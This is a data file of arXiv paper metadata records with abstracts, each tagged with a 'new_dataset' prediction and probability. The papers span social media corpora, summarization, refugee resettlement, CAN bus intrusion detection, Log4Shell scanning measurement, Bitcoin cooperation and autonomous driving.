id
stringlengths 9
10
| submitter
stringlengths 2
52
⌀ | authors
stringlengths 4
6.51k
| title
stringlengths 4
246
| comments
stringlengths 1
523
⌀ | journal-ref
stringlengths 4
345
⌀ | doi
stringlengths 11
120
⌀ | report-no
stringlengths 2
243
⌀ | categories
stringlengths 5
98
| license
stringclasses 9
values | abstract
stringlengths 33
3.33k
| versions
list | update_date
timestamp[s] | authors_parsed
list | prediction
stringclasses 1
value | probability
float64 0.95
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2009.00596
|
Salvatore Giorgi
|
Salvatore Giorgi, Sharath Chandra Guntuku, McKenzie
Himelein-Wachowiak, Amy Kwarteng, Sy Hwang, Muhammad Rahman, and Brenda
Curtis
|
Twitter Corpus of the #BlackLivesMatter Movement And Counter Protests:
2013 to 2021
|
Published at the 16th International AAAI Conference on Web and Social
Media (ICWSM) 2022
| null | null | null |
cs.SI cs.CL
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
Black Lives Matter (BLM) is a decentralized social movement protesting
violence against Black individuals and communities, with a focus on police
brutality. The movement gained significant attention following the killings of
Ahmaud Arbery, Breonna Taylor, and George Floyd in 2020. The #BlackLivesMatter
social media hashtag has come to represent the grassroots movement, with
similar hashtags counter protesting the BLM movement, such as #AllLivesMatter,
and #BlueLivesMatter. We introduce a data set of 63.9 million tweets from 13.0
million users from over 100 countries which contain one of the following
keywords: BlackLivesMatter, AllLivesMatter, and BlueLivesMatter. This data set
contains all currently available tweets from the beginning of the BLM movement
in 2013 to 2021. We summarize the data set and show temporal trends in use of
both the BlackLivesMatter keyword and keywords associated with counter
movements. Additionally, for each keyword, we create and release a set of
Latent Dirichlet Allocation (LDA) topics (i.e., automatically clustered groups
of semantically co-occuring words) to aid researchers in identifying linguistic
patterns across the three keywords.
|
[
{
"version": "v1",
"created": "Tue, 1 Sep 2020 17:37:39 GMT"
},
{
"version": "v2",
"created": "Mon, 28 Sep 2020 16:20:16 GMT"
},
{
"version": "v3",
"created": "Tue, 7 Jun 2022 15:45:39 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Giorgi",
"Salvatore",
""
],
[
"Guntuku",
"Sharath Chandra",
""
],
[
"Himelein-Wachowiak",
"McKenzie",
""
],
[
"Kwarteng",
"Amy",
""
],
[
"Hwang",
"Sy",
""
],
[
"Rahman",
"Muhammad",
""
],
[
"Curtis",
"Brenda",
""
]
] |
new_dataset
| 0.994865 |
2104.07091
|
Mingda Chen
|
Mingda Chen, Zewei Chu, Sam Wiseman, Kevin Gimpel
|
SummScreen: A Dataset for Abstractive Screenplay Summarization
|
ACL 2022
| null | null | null |
cs.CL
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We introduce SummScreen, a summarization dataset comprised of pairs of TV
series transcripts and human written recaps. The dataset provides a challenging
testbed for abstractive summarization for several reasons. Plot details are
often expressed indirectly in character dialogues and may be scattered across
the entirety of the transcript. These details must be found and integrated to
form the succinct plot descriptions in the recaps. Also, TV scripts contain
content that does not directly pertain to the central plot but rather serves to
develop characters or provide comic relief. This information is rarely
contained in recaps. Since characters are fundamental to TV series, we also
propose two entity-centric evaluation metrics. Empirically, we characterize the
dataset by evaluating several methods, including neural models and those based
on nearest neighbors. An oracle extractive approach outperforms all benchmarked
models according to automatic metrics, showing that the neural models are
unable to fully exploit the input transcripts. Human evaluation and qualitative
analysis reveal that our non-oracle models are competitive with their oracle
counterparts in terms of generating faithful plot events and can benefit from
better content selectors. Both oracle and non-oracle models generate unfaithful
facts, suggesting future research directions.
|
[
{
"version": "v1",
"created": "Wed, 14 Apr 2021 19:37:40 GMT"
},
{
"version": "v2",
"created": "Thu, 10 Mar 2022 00:28:54 GMT"
},
{
"version": "v3",
"created": "Mon, 6 Jun 2022 19:02:30 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Chen",
"Mingda",
""
],
[
"Chu",
"Zewei",
""
],
[
"Wiseman",
"Sam",
""
],
[
"Gimpel",
"Kevin",
""
]
] |
new_dataset
| 0.99986 |
2105.14388
|
Paul G\"olz
|
Narges Ahani, Paul G\"olz, Ariel D. Procaccia, Alexander Teytelboym
and Andrew C. Trapp
|
Dynamic Placement in Refugee Resettlement
|
Expanded related work, added experiments with bootstrapped arrivals
in Section 7.2, added various experiments in the appendix
| null |
10.1145/3465456.3467534
| null |
cs.GT physics.soc-ph
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Employment outcomes of resettled refugees depend strongly on where they are
placed inside the host country. Each week, a resettlement agency is assigned a
batch of refugees by the United States government. The agency must place these
refugees in its local affiliates, while respecting the affiliates' yearly
capacities. We develop an allocation system that suggests where to place an
incoming refugee, in order to improve total employment success. Our algorithm
is based on two-stage stochastic programming and achieves over 98 percent of
the hindsight-optimal employment, compared to under 90 percent of current
greedy-like approaches. This dramatic improvement persists even when we
incorporate a vast array of practical features of the refugee resettlement
process including indivisible families, batching, and uncertainty with respect
to the number of future arrivals. Our algorithm is now part of the Annie MOORE
optimization software used by a leading American refugee resettlement agency.
|
[
{
"version": "v1",
"created": "Sat, 29 May 2021 23:35:41 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 02:49:52 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Ahani",
"Narges",
""
],
[
"Gölz",
"Paul",
""
],
[
"Procaccia",
"Ariel D.",
""
],
[
"Teytelboym",
"Alexander",
""
],
[
"Trapp",
"Andrew C.",
""
]
] |
new_dataset
| 0.994247 |
2110.13492
|
Viet-Anh Nguyen
|
Viet-Anh Nguyen, Anh H. T. Nguyen, and Andy W. H. Khong
|
TUNet: A Block-online Bandwidth Extension Model based on Transformers
and Self-supervised Pretraining
|
Published as a conference paper at ICASSP 2022, 5 pages, 4 figures, 3
tables
| null |
10.1109/ICASSP43922.2022.9747699
| null |
cs.LG cs.SD eess.AS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We introduce a block-online variant of the temporal feature-wise linear
modulation (TFiLM) model to achieve bandwidth extension. The proposed
architecture simplifies the UNet backbone of the TFiLM to reduce inference time
and employs an efficient transformer at the bottleneck to alleviate performance
degradation. We also utilize self-supervised pretraining and data augmentation
to enhance the quality of bandwidth extended signals and reduce the sensitivity
with respect to downsampling methods. Experiment results on the VCTK dataset
show that the proposed method outperforms several recent baselines in both
intrusive and non-intrusive metrics. Pretraining and filter augmentation also
help stabilize and enhance the overall performance.
|
[
{
"version": "v1",
"created": "Tue, 26 Oct 2021 08:43:46 GMT"
},
{
"version": "v2",
"created": "Wed, 5 Jan 2022 12:59:28 GMT"
},
{
"version": "v3",
"created": "Thu, 6 Jan 2022 17:41:26 GMT"
},
{
"version": "v4",
"created": "Thu, 31 Mar 2022 04:05:46 GMT"
},
{
"version": "v5",
"created": "Tue, 7 Jun 2022 08:46:20 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Nguyen",
"Viet-Anh",
""
],
[
"Nguyen",
"Anh H. T.",
""
],
[
"Khong",
"Andy W. H.",
""
]
] |
new_dataset
| 0.996745 |
2204.05762
|
Ruwayda Alharbi
|
Ruwayda Alharbi, Ond\v{r}ej Strnad, Tobias Klein, Ivan Viola
|
Nanomatrix: Scalable Construction of Crowded Biological Environments
| null | null | null | null |
cs.GR
|
http://creativecommons.org/licenses/by-sa/4.0/
|
We present a novel method for interactive construction and rendering of
extremely large molecular scenes, capable of representing multiple biological
cells at atomistic detail. Our method is tailored for scenes, which are
procedurally constructed, based on a given set of building rules. Rendering of
large scenes normally requires the entire scene available in-core, or
alternatively, it requires out-of-core management to load data into the memory
hierarchy as a part of the rendering loop. Instead of out-of-core memory
management, we propose to procedurally generate the scene on-demand on the fly.
The key idea is a positional- and view-dependent procedural scene-construction
strategy, where only a fraction of the atomistic scene around the camera is
available in the GPU memory at any given time. The atomistic detail is
populated into a uniform-space partitioning using a grid that covers the entire
scene. Most of the grid cells are not filled with geometry, only those are
populated that are potentially seen by the camera. The atomistic detail is
populated in a compute shader and its representation is connected with
acceleration data structures for hardware ray-tracing of modern GPUs. Objects
which are far away, where atomistic detail is not perceivable from a given
viewpoint, are represented by a triangle mesh mapped with a seamless texture,
generated from the rendering of geometry from atomistic detail. The algorithm
consists of two pipelines, the construction computes pipeline and the rendering
pipeline, which work together to render molecular scenes at an atomistic
resolution far beyond the limit of the GPU memory containing trillions of
atoms. We demonstrate our technique on multiple models of SARS-CoV-2 and the
red blood cell.
|
[
{
"version": "v1",
"created": "Tue, 12 Apr 2022 12:55:28 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 06:45:56 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Alharbi",
"Ruwayda",
""
],
[
"Strnad",
"Ondřej",
""
],
[
"Klein",
"Tobias",
""
],
[
"Viola",
"Ivan",
""
]
] |
new_dataset
| 0.957556 |
2205.01306
|
Md Hasan Shahriar
|
Md Hasan Shahriar, Yang Xiao, Pablo Moriano, Wenjing Lou, and Y.
Thomas Hou
|
CANShield: Signal-based Intrusion Detection for Controller Area Networks
|
15 pages, 6 figures, A version of this paper is accepted by escar USA
2022
| null | null | null |
cs.CR cs.LG
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Modern vehicles rely on a fleet of electronic control units (ECUs) connected
through controller area network (CAN) buses for critical vehicular control.
However, with the expansion of advanced connectivity features in automobiles
and the elevated risks of internal system exposure, the CAN bus is increasingly
prone to intrusions and injection attacks. The ordinary injection attacks
disrupt the typical timing properties of the CAN data stream, and the
rule-based intrusion detection systems (IDS) can easily detect them. However,
advanced attackers can inject false data to the time series sensory data
(signal), while looking innocuous by the pattern/frequency of the CAN messages.
Such attacks can bypass the rule-based IDS or any anomaly-based IDS built on
binary payload data. To make the vehicles robust against such intelligent
attacks, we propose CANShield, a signal-based intrusion detection framework for
the CAN bus. CANShield consists of three modules: a data preprocessing module
that handles the high-dimensional CAN data stream at the signal level and makes
them suitable for a deep learning model; a data analyzer module consisting of
multiple deep autoencoder (AE) networks, each analyzing the time-series data
from a different temporal perspective; and finally an attack detection module
that uses an ensemble method to make the final decision. Evaluation results on
two high-fidelity signal-based CAN attack datasets show the high accuracy and
responsiveness of CANShield in detecting wide-range of advanced intrusion
attacks.
|
[
{
"version": "v1",
"created": "Tue, 3 May 2022 04:52:44 GMT"
},
{
"version": "v2",
"created": "Sun, 5 Jun 2022 16:10:42 GMT"
},
{
"version": "v3",
"created": "Tue, 7 Jun 2022 06:20:08 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Shahriar",
"Md Hasan",
""
],
[
"Xiao",
"Yang",
""
],
[
"Moriano",
"Pablo",
""
],
[
"Lou",
"Wenjing",
""
],
[
"Hou",
"Y. Thomas",
""
]
] |
new_dataset
| 0.997747 |
2205.02544
|
Raphael Hiesgen
|
Raphael Hiesgen, Marcin Nawrocki, Thomas C. Schmidt, Matthias
W\"ahlisch
|
The Race to the Vulnerable: Measuring the Log4j Shell Incident
|
Proc. of Network Traffic Measurement and Analysis Conference (TMA
'22), camera ready
| null | null | null |
cs.CR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The critical remote-code-execution (RCE) Log4Shell is a severe vulnerability
that was disclosed to the public on December 10, 2021. It exploits a bug in the
wide-spread Log4j library. Any service that uses the library and exposes an
interface to the Internet is potentially vulnerable.
In this paper, we measure the rush of scanners during the two months after
the disclosure. We use several vantage points to observe both researchers and
attackers. For this purpose, we collect and analyze payloads sent by benign and
malicious communication parties, their origins, and churn. We find that the
initial rush of scanners quickly ebbed. Especially non-malicious scanners were
only interested in the days after the disclosure. In contrast, malicious
scanners continue targeting the vulnerability.
|
[
{
"version": "v1",
"created": "Thu, 5 May 2022 10:08:57 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 13:56:20 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Hiesgen",
"Raphael",
""
],
[
"Nawrocki",
"Marcin",
""
],
[
"Schmidt",
"Thomas C.",
""
],
[
"Wählisch",
"Matthias",
""
]
] |
new_dataset
| 0.998196 |
2206.02260
|
Ekaterina Nepovinnykh Mrs
|
Ekaterina Nepovinnykh, Tuomas Eerola, Vincent Biard, Piia Mutka, Marja
Niemi, Heikki K\"alvi\"ainen, Mervi Kunnasranta
|
SealID: Saimaa ringed seal re-identification dataset
|
15 pages, 9 figures
| null | null | null |
cs.CV q-bio.PE
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Wildlife camera traps and crowd-sourced image material provide novel
possibilities to monitor endangered animal species. However, massive image
volumes that these methods produce are overwhelming for researchers to go
through manually which calls for automatic systems to perform the analysis. The
analysis task that has gained the most attention is the re-identification of
individuals, as it allows, for example, to study animal migration or to
estimate the population size. The Saimaa ringed seal (Pusa hispida saimensis)
is an endangered subspecies only found in the Lake Saimaa, Finland, and is one
of the few existing freshwater seal species. Ringed seals have permanent pelage
patterns that are unique to each individual which can be used for the
identification of individuals. Large variation in poses further exacerbated by
the deformable nature of seals together with varying appearance and low
contrast between the ring pattern and the rest of the pelage makes the Saimaa
ringed seal re-identification task very challenging, providing a good benchmark
to evaluate state-of-the-art re-identification methods. Therefore, we make our
Saimaa ringed seal image (SealID) dataset (N=57) publicly available for
research purposes. In this paper, the dataset is described, the evaluation
protocol for re-identification methods is proposed, and the results for two
baseline methods HotSpotter and NORPPA are provided. The SealID dataset has
been made publicly available.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 20:35:32 GMT"
},
{
"version": "v2",
"created": "Tue, 7 Jun 2022 11:08:49 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Nepovinnykh",
"Ekaterina",
""
],
[
"Eerola",
"Tuomas",
""
],
[
"Biard",
"Vincent",
""
],
[
"Mutka",
"Piia",
""
],
[
"Niemi",
"Marja",
""
],
[
"Kälviäinen",
"Heikki",
""
],
[
"Kunnasranta",
"Mervi",
""
]
] |
new_dataset
| 0.999808 |
2206.02871
|
Alyssa Blackburn
|
Alyssa Blackburn, Christoph Huber, Yossi Eliaz, Muhammad S. Shamim,
David Weisz, Goutham Seshadri, Kevin Kim, Shengqi Hang, and Erez Lieberman
Aiden
|
Cooperation among an anonymous group protected Bitcoin during failures
of decentralization
|
12 pages main text 6 main text figures 76 total pages 23 supplemental
figures
| null | null | null |
cs.GT cs.CY physics.soc-ph
|
http://creativecommons.org/licenses/by/4.0/
|
Bitcoin is a digital currency designed to rely on a decentralized, trustless
network of anonymous agents. Using a pseudonymous-address-linking procedure
that achieves >99% sensitivity and >99% specificity, we reveal that between
launch (January 3rd, 2009), and when the price reached $1 (February 9th, 2011),
most bitcoin was mined by only sixty-four agents. This was due to the rapid
emergence of Pareto distributions in bitcoin income, producing such extensive
resource centralization that almost all contemporary bitcoin addresses can be
connected to these top agents by a chain of six transactions. Centralization
created a social dilemma. Attackers could routinely exploit bitcoin via a "51%
attack", making it possible for them to repeatedly spend the same bitcoins. Yet
doing so would harm the community. Strikingly, we find that potential attackers
always chose to cooperate instead. We model this dilemma using an N-player
Centipede game in which anonymous players can choose to exploit, and thereby
undermine, an appreciating good. Combining theory and economic experiments, we
show that, even when individual payoffs are unchanged, cooperation is more
frequent when the game is played by an anonymous group. Although bitcoin was
designed to rely on a decentralized, trustless network of anonymous agents, its
early success rested instead on cooperation among a small group of altruistic
founders.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 19:54:21 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Blackburn",
"Alyssa",
""
],
[
"Huber",
"Christoph",
""
],
[
"Eliaz",
"Yossi",
""
],
[
"Shamim",
"Muhammad S.",
""
],
[
"Weisz",
"David",
""
],
[
"Seshadri",
"Goutham",
""
],
[
"Kim",
"Kevin",
""
],
[
"Hang",
"Shengqi",
""
],
[
"Aiden",
"Erez Lieberman",
""
]
] |
new_dataset
| 0.987804 |
2206.02894
|
Adam Caulfield
|
Adam Caulfield, Norrathep Rattanavipanon, Ivan De Oliveira Nunes
|
ASAP: Reconciling Asynchronous Real-Time Operations and Proofs of
Execution in Simple Embedded Systems
|
2022 59th ACM/IEEE Design Automation Conference (DAC)
| null | null | null |
cs.CR cs.AR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Embedded devices are increasingly ubiquitous and their importance is hard to
overestimate. While they often support safety-critical functions (e.g., in
medical devices and sensor-alarm combinations), they are usually implemented
under strict cost/energy budgets, using low-end microcontroller units (MCUs)
that lack sophisticated security mechanisms. Motivated by this issue, recent
work developed architectures capable of generating Proofs of Execution (PoX)
for the correct/expected software in potentially compromised low-end MCUs. In
practice, this capability can be leveraged to provide "integrity from birth" to
sensor data, by binding the sensed results/outputs to an unforgeable
cryptographic proof of execution of the expected sensing process. Despite this
significant progress, current PoX schemes for low-end MCUs ignore the real-time
needs of many applications. In particular, security of current PoX schemes
precludes any interrupts during the execution being proved. We argue that lack
of asynchronous capabilities (i.e., interrupts within PoX) can obscure PoX
usefulness, as several applications require processing real-time and
asynchronous events. To bridge this gap, we propose, implement, and evaluate an
Architecture for Secure Asynchronous Processing in PoX (ASAP). ASAP is secure
under full software compromise, enables asynchronous PoX, and incurs less
hardware overhead than prior work.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 20:38:44 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Caulfield",
"Adam",
""
],
[
"Rattanavipanon",
"Norrathep",
""
],
[
"Nunes",
"Ivan De Oliveira",
""
]
] |
new_dataset
| 0.987275 |
2206.02971
|
Mayra Nu\~nez Lopez Dr.
|
Sof\'ia de la Mora Tostado, Mayra N\'u\~nez-L\'opez, Esteban A.
Hern\'andez-Vargas
|
Human Trafficking in Mexico: Data sources, Network Analysis and the
Limits of Dismantling Strategies
| null | null | null | null |
cs.SI math.OC
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Human trafficking is a heartless crime that represents the second most
profitable crime in the world. Mexico's geographical position makes it a
country with high levels of human trafficking. Using the snowball sampling
method, the major contribution of this paper is the abstraction of the human
trafficking network on the southern border of Mexico. Based on a social network
analysis, it is identified that the criminal network is moderately centralized
(44.32%) and with medium density (0.401). Therefore, the network has minimal
cohesiveness and members may find it difficult to share information, money, or
products among themselves. To evaluate different dismantling strategies to
tackle the criminal organization, three algorithms are evaluated. We found that
the first actors to be removed are neither the most connected nor the most
peripheral, but the actors who are moderately connected to people of their kind
should be removed. In summary, this paper provides a significant step forward
to understand quantitatively human trafficking networks and evaluate the limits
of dismantling strategies.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 02:22:07 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Tostado",
"Sofía de la Mora",
""
],
[
"Núñez-López",
"Mayra",
""
],
[
"Hernández-Vargas",
"Esteban A.",
""
]
] |
new_dataset
| 0.985077 |
2206.02982
|
Weiyi Lu
|
Xiaodi Sun, Sunny Rajagopalan, Priyanka Nigam, Weiyi Lu, Yi Xu,
Belinda Zeng, Trishul Chilimbi
|
DynaMaR: Dynamic Prompt with Mask Token Representation
| null | null | null | null |
cs.CL cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Recent research has shown that large language models pretrained using
unsupervised approaches can achieve significant performance improvement on many
downstream tasks. Typically when adapting these language models to downstream
tasks, like a classification or regression task, we employ a fine-tuning
paradigm in which the sentence representation from the language model is input
to a task-specific head; the model is then fine-tuned end-to-end. However, with
the emergence of models like GPT-3, prompt-based fine-tuning has been proven to
be a successful approach for few-shot tasks. Inspired by this work, we study
discrete prompt technologies in practice. There are two issues that arise with
the standard prompt approach. First, it can overfit on the prompt template.
Second, it requires manual effort to formulate the downstream task as a
language model problem. In this paper, we propose an improvement to
prompt-based fine-tuning that addresses these two issues. We refer to our
approach as DynaMaR -- Dynamic Prompt with Mask Token Representation. Results
show that DynaMaR can achieve an average improvement of 10% in few-shot
settings and improvement of 3.7% in data-rich settings over the standard
fine-tuning approach on four e-commerce applications.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 02:54:36 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Sun",
"Xiaodi",
""
],
[
"Rajagopalan",
"Sunny",
""
],
[
"Nigam",
"Priyanka",
""
],
[
"Lu",
"Weiyi",
""
],
[
"Xu",
"Yi",
""
],
[
"Zeng",
"Belinda",
""
],
[
"Chilimbi",
"Trishul",
""
]
] |
new_dataset
| 0.994138 |
2206.02997
|
Deng Bowen
|
Bowen Deng and Dongchang Liu
|
TadML: A fast temporal action detection with Mechanics-MLP
|
8 pages,3 figures
| null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Temporal Action Detection(TAD) is a crucial but challenging task in video
understanding.It is aimed at detecting both the type and start-end frame for
each action instance in a long, untrimmed video.Most current models adopt both
RGB and Optical-Flow streams for the TAD task. Thus, original RGB frames must
be converted manually into Optical-Flow frames with additional computation and
time cost, which is an obstacle to achieve real-time processing. At present,
many models adopt two-stage strategies, which would slow the inference speed
down and complicatedly tuning on proposals generating.By comparison, we propose
a one-stage anchor-free temporal localization method with RGB stream only, in
which a novel Newtonian \emph{Mechanics-MLP} architecture is established. It
has comparable accuracy with all existing state-of-the-art models, while
surpasses the inference speed of these methods by a large margin. The typical
inference speed in this paper is astounding 4.44 video per second on THUMOS14.
In applications, because there is no need to convert optical flow, the
inference speed will be faster.It also proves that \emph{MLP} has great
potential in downstream tasks such as TAD. The source code is available at
\url{https://github.com/BonedDeng/TadML}
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 04:07:48 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Deng",
"Bowen",
""
],
[
"Liu",
"Dongchang",
""
]
] |
new_dataset
| 0.997707 |
2206.03004
|
Eric Wolff
|
Tung Phan-Minh and Forbes Howington and Ting-Sheng Chu and Sang Uk Lee
and Momchil S. Tomov and Nanxiang Li and Caglayan Dicle and Samuel Findler
and Francisco Suarez-Ruiz and Robert Beaudoin and Bo Yang and Sammy Omari and
Eric M. Wolff
|
Driving in Real Life with Inverse Reinforcement Learning
| null | null | null | null |
cs.RO cs.AI cs.LG
|
http://creativecommons.org/licenses/by/4.0/
|
In this paper, we introduce the first learning-based planner to drive a car
in dense, urban traffic using Inverse Reinforcement Learning (IRL). Our
planner, DriveIRL, generates a diverse set of trajectory proposals, filters
these trajectories with a lightweight and interpretable safety filter, and then
uses a learned model to score each remaining trajectory. The best trajectory is
then tracked by the low-level controller of our self-driving vehicle. We train
our trajectory scoring model on a 500+ hour real-world dataset of expert
driving demonstrations in Las Vegas within the maximum entropy IRL framework.
DriveIRL's benefits include: a simple design due to only learning the
trajectory scoring function, relatively interpretable features, and strong
real-world performance. We validated DriveIRL on the Las Vegas Strip and
demonstrated fully autonomous driving in heavy traffic, including scenarios
involving cut-ins, abrupt braking by the lead vehicle, and hotel pickup/dropoff
zones. Our dataset will be made public to help further research in this area.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 04:36:46 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Phan-Minh",
"Tung",
""
],
[
"Howington",
"Forbes",
""
],
[
"Chu",
"Ting-Sheng",
""
],
[
"Lee",
"Sang Uk",
""
],
[
"Tomov",
"Momchil S.",
""
],
[
"Li",
"Nanxiang",
""
],
[
"Dicle",
"Caglayan",
""
],
[
"Findler",
"Samuel",
""
],
[
"Suarez-Ruiz",
"Francisco",
""
],
[
"Beaudoin",
"Robert",
""
],
[
"Yang",
"Bo",
""
],
[
"Omari",
"Sammy",
""
],
[
"Wolff",
"Eric M.",
""
]
] |
new_dataset
| 0.999423 |
2206.03018
|
Lik Hang Lee Dr.
|
Lik-Hang Lee, Pengyuan Zhou, Tristan Braud, Pan Hui
|
What is the Metaverse? An Immersive Cyberspace and Open Challenges
|
7 pages, 2 figures
| null | null | null |
cs.MM cs.CY
|
http://creativecommons.org/licenses/by-nc-sa/4.0/
|
The Metaverse refers to a virtual-physical blended space in which multiple
users can concurrently interact with a unified computer-generated environment
and other users, which can be regarded as the next significant milestone of the
current cyberspace. This article primarily discusses the development and
challenges of the Metaverse. We first briefly describe the development of
cyberspace and the necessity of technology enablers. Accordingly, our bottom-up
approach highlights three critical technology enablers for the Metaverse:
networks, systems, and users. Also, we highlight a number of indispensable
issues, under technological and ecosystem perspectives, that build and sustain
the Metaverse.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 05:22:42 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Lee",
"Lik-Hang",
""
],
[
"Zhou",
"Pengyuan",
""
],
[
"Braud",
"Tristan",
""
],
[
"Hui",
"Pan",
""
]
] |
new_dataset
| 0.958212 |
2206.03032
|
Zhiyao Xie
|
Zhiyao Xie
|
Intelligent Circuit Design and Implementation with Machine Learning
|
Ph.D. Dissertation, 2022. Due to the limitation "The abstract field
cannot be longer than 1,920 characters", the abstract here is shorter than
that in the PDF file
| null | null | null |
cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
The stagnation of EDA technologies roots from insufficient knowledge reuse.
In practice, very similar simulation or optimization results may need to be
repeatedly constructed from scratch. This motivates my research on introducing
more 'intelligence' to EDA with machine learning (ML), which explores complex
correlations in design flows based on prior data. Besides design time, I also
propose ML solutions to boost IC performance by assisting the circuit
management at runtime. In this dissertation, I present multiple fast yet
accurate ML models covering a wide range of chip design stages from the
register-transfer level (RTL) to sign-off, solving primary chip-design problems
about power, timing, interconnect, IR drop, routability, and design flow
tuning. Targeting the RTL stage, I present APOLLO, a fully automated power
modeling framework. It constructs an accurate per-cycle power model by
extracting the most power-correlated signals. The model can be further
implemented on chip for runtime power management with unprecedented low
hardware costs. Targeting gate-level netlist, I present Net2 for early
estimations on post-placement wirelength. It further enables more accurate
timing analysis without actual physical design information. Targeting circuit
layout, I present RouteNet for early routability prediction. As the first deep
learning-based routability estimator, some feature-extraction and model-design
principles proposed in it are widely adopted by later works. I also present
PowerNet for fast IR drop estimation. It captures spatial and temporal
information about power distribution with a customized CNN architecture. Last,
besides targeting a single design step, I present FIST to efficiently tune
design flow parameters during both logic synthesis and physical design.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 06:17:52 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Xie",
"Zhiyao",
""
]
] |
new_dataset
| 0.967922 |
2206.03047
|
Benoit Rittaud
|
Beno\^it Rittaud (LAGA)
|
Fibonacci-like sequences for variants of the tower of Hanoi, and
corresponding graphs and gray codes
| null | null | null | null |
cs.DM math.CO math.NT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We modify the rules of the classical Tower of Hanoi puzzle in a quite natural
way to get the Fibonacci sequence involved in the optimal algorithm of
resolution, and show some nice properties of such a variant. In particular, we
deduce from this Tower of Hanoi-Fibonacci a Gray-like code on the set of binary
words without the factor 11, which has some properties intersting for itself
and from which an iterative algorithm for the Tower of Hanoi-Fibonacci is
obtained. Such an algorithm involves the Fibonacci substitution. Eventually, we
briefly extend the study to some natural generalizations.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 06:42:22 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Rittaud",
"Benoît",
"",
"LAGA"
]
] |
new_dataset
| 0.993316 |
2206.03139
|
Chen Yan
|
Chen Yan, Federico Carnevale, Petko Georgiev, Adam Santoro, Aurelia
Guy, Alistair Muldal, Chia-Chun Hung, Josh Abramson, Timothy Lillicrap,
Gregory Wayne
|
Intra-agent speech permits zero-shot task acquisition
| null | null | null | null |
cs.LG cs.AI cs.CL
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Human language learners are exposed to a trickle of informative,
context-sensitive language, but a flood of raw sensory data. Through both
social language use and internal processes of rehearsal and practice, language
learners are able to build high-level, semantic representations that explain
their perceptions. Here, we take inspiration from such processes of "inner
speech" in humans (Vygotsky, 1934) to better understand the role of intra-agent
speech in embodied behavior. First, we formally pose intra-agent speech as a
semi-supervised problem and develop two algorithms that enable visually
grounded captioning with little labeled language data. We then experimentally
compute scaling curves over different amounts of labeled data and compare the
data efficiency against a supervised learning baseline. Finally, we incorporate
intra-agent speech into an embodied, mobile manipulator agent operating in a 3D
virtual world, and show that with as few as 150 additional image captions,
intra-agent speech endows the agent with the ability to manipulate and answer
questions about a new object without any related task-directed experience
(zero-shot). Taken together, our experiments suggest that modelling intra-agent
speech is effective in enabling embodied agents to learn new tasks efficiently
and without direct interaction experience.
|
[
{
"version": "v1",
"created": "Tue, 7 Jun 2022 09:28:10 GMT"
}
] | 2022-06-08T00:00:00 |
[
[
"Yan",
"Chen",
""
],
[
"Carnevale",
"Federico",
""
],
[
"Georgiev",
"Petko",
""
],
[
"Santoro",
"Adam",
""
],
[
"Guy",
"Aurelia",
""
],
[
"Muldal",
"Alistair",
""
],
[
"Hung",
"Chia-Chun",
""
],
[
"Abramson",
"Josh",
""
],
[
"Lillicrap",
"Timothy",
""
],
[
"Wayne",
"Gregory",
""
]
] |
new_dataset
| 0.996183 |
2206.03190
|
Minho Oh
|
Minho Oh, Euigon Jung, Hyungtae Lim, Wonho Song, Sumin Hu, Eungchang
Mason Lee, Junghee Park, Jaekyung Kim, Jangwoo Lee, and Hyun Myung
|
TRAVEL: Traversable Ground and Above-Ground Object Segmentation Using
Graph Representation of 3D LiDAR Scans
|
RA-L accepted
| null | null | null |
cs.RO
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Perception of traversable regions and objects of interest from a 3D point
cloud is one of the critical tasks in autonomous navigation. A ground vehicle
needs to look for traversable terrains that are explorable by wheels. Then, to
make safe navigation decisions, the segmentation of objects positioned on those
terrains has to be followed up. However, over-segmentation and
under-segmentation can negatively influence such navigation decisions. To that
end, we propose TRAVEL, which performs traversable ground detection and object
